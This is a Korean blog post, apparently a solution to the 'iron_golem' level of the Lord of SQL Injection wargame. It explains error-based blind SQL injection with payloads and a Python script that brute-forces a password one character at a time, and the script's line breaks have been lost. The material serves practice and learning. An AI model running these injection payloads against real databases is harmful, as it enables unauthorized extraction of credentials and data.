-
[load of sql injection] iron_golemwebhacking/load of sql injection 2018. 11. 18. 15:41반응형
Error Blind Sql Injection 기법
' or 1=1 order by 1 # -> 컬럼 행 갯수를 알 수 있다. * 행 갯수 아는 방법 알아보기
' or if(ord(substr(pw,1,1))=30,1,(select 1 union select 2))
' or if(ascii(substr(pw,1,1))=30,1,(select 1 union select 2)) 서로 차이점은?
import requestsurl = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 IDlist1 = []for k in range( 1, 12 ):for j in range( 30, 300):text = "' or if(ord(substr(pw,"+str(k)+",1))="+str(j)+", 1,(select 1 union select 2)) -- "params = { 'pw' : text }response = requests.get( url, params = params, cookies = cookies )print(response.text)if( not "Subquery returns more than 1 row" in response.text ):print( response.text )list1.append(chr(j))breakprint(list1)반응형'webhacking > load of sql injection' 카테고리의 다른 글
[load of sql injection] hell_fire (0) 2018.11.20 [load of sql injection] dark_eyes (0) 2018.11.20 [load of sql injection] dragon (0) 2018.11.17 [load of sql injection] xavis (0) 2018.11.17 [load of sql injection] nightmare (0) 2018.11.17